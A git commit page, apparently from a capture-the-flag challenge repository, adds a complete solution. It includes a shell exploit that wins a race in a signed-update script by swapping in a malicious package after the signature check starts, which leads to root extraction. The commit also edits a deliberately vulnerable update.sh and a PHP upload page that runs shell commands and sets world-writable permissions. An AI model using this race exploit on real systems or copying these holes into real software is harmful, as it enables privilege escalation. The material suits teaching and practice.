g/cyberchallenge-modem
1
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity

Update.sh does work; added complete solutions

Browse Source
This commit is contained in:
Giulio 2020-09-24 01:02:27 +02:00
parent 07dc510a4a
commit efef6c0a2d
4 changed files with 26 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
solution/exploit.sh Normal file
View File

@ -0,0 +1,16 @@
#!/bin/sh
# The solution require the original update.tar.cc in /tmp named 'orig'
# and the fake package renamed to 'pwn' in /tmp. Both need to have chmod 777
cd /tmp;
cp orig update.tar.cc;
chmod 777 update.tar.cc;
sudo -u upgrade /bin/sh /update.sh > log &
while true; do
if [[ "$(cat log | grep Checking)" ]]; then
sleep 0.01
cp pwn update.tar.cc;
fi
done;

BIN
solution/update.tar.cc Normal file
View File

Binary file not shown.

13
update/update.sh
View File

@ -13,30 +13,29 @@ if [[ "$auth" != "$password" ]]; then
exit 1 exit 1
fi fi
pubkey="/pub.pem" pubkey="/pub.pem"
file="/tmp/update.tar.cc" file="/tmp/update.tar.cc"
/bin/chmod 777 $file sig="/tmp/sig"
/bin/echo "### ccOS Update Script ###" /bin/echo "### ccOS Update Script ###"
/bin/echo "[+] Starting" /bin/echo "[+] Starting"
/bin/sleep 1
/bin/echo "[+] Extracting Signature" /bin/echo "[+] Extracting Signature"
skip=$(expr $(stat -c '%s' $file) - 256) skip=$(expr $(stat -c '%s' $file) - 256)
if [[ -L $file ]] if [[ -L $file ]]
then then
exit 0 exit 0
fi fi
/bin/dd if=/tmp/update.tar.cc of=sig bs=1 count=256 skip=$skip /bin/dd if=/tmp/update.tar.cc of=$sig bs=1 count=256 skip=$skip
/usr/bin/truncate -s $skip $file /usr/bin/truncate -s $skip $file
check=`/usr/bin/openssl dgst -sha256 -verify $pubkey -signature /tmp/sig $file` /bin/echo "[+] Checking Signature"
check=`/usr/bin/openssl dgst -sha256 -verify $pubkey -signature $sig $file`
if [ "$check" == "Verified OK" ] if [ "$check" == "Verified OK" ]
then then
/bin/echo "[+] Signature is valid!" /bin/echo "[+] Signature is valid!"
/bin/echo "[+] Upgrading..." /bin/echo "[+] Upgrading..."
/bin/tar -xvf $file -C / /bin/tar -xvf $file -C /
/bin/rm /tmp/sig /bin/rm $sig
/bin/echo "[+] Done" /bin/echo "[+] Done"
else else
/bin/echo "[-] Signature error, exiting..." /bin/echo "[-] Signature error, exiting..."
/bin/rm /tmp/sig /bin/rm $sig
fi fi

7
webpanel/update.php
View File

@ -5,8 +5,9 @@ require_once("includes/header.php");
require_once("includes/nav.php"); require_once("includes/nav.php");
if ($_SERVER['REQUEST_METHOD'] === POST && isset($_FILES['update']) && $_FILES['update']['size'] > 10000000 && $_FILES['upfile']['size'] < 10000000 && isset($_POST['password']) && !empty($_POST['password'])) { if ($_SERVER['REQUEST_METHOD'] === POST && isset($_FILES['update']) && $_FILES['update']['size'] > 10000000 && $_FILES['upfile']['size'] < 10000000 && isset($_POST['password']) && !empty($_POST['password'])) {
move_uploaded_file($_FILES['file']['tmp_name'], '/tmp/update.tgz.cc'); move_uploaded_file($_FILES['file']['tmp_name'], '/tmp/update.tar.cc');
exec("/usr/bin/sudo key='".escapeshellarg($_POST['password'])."' /update.sh", $result); exec("/bin/chmod 777 /tmp/update.tar.cc");
exec("key='".escapeshellarg($_POST['password'])."' /bin/sh -c '/usr/bin/sudo /bin/sh /update.sh'", $result);
} }
?> ?>
@ -19,7 +20,7 @@ if ($_SERVER['REQUEST_METHOD'] === POST && isset($_FILES['update']) && $_FILES['
<input type="submit" class="btn btn-b btn-sm smooth" value="Upload"> <input type="submit" class="btn btn-b btn-sm smooth" value="Upload">
<p> <p>
<ul> <ul>
<li>Please select the file <i>ccOS-ver-xxxx.tgz.cc</i></li> <li>Please select the file <i>update.tar.cc</i></li>
<li>The update will take about 2 minutes</li> <li>The update will take about 2 minutes</li>
<li>Updates are cryptographically signed for integrity and authenticity</li> <li>Updates are cryptographically signed for integrity and authenticity</li>
</ul> </ul>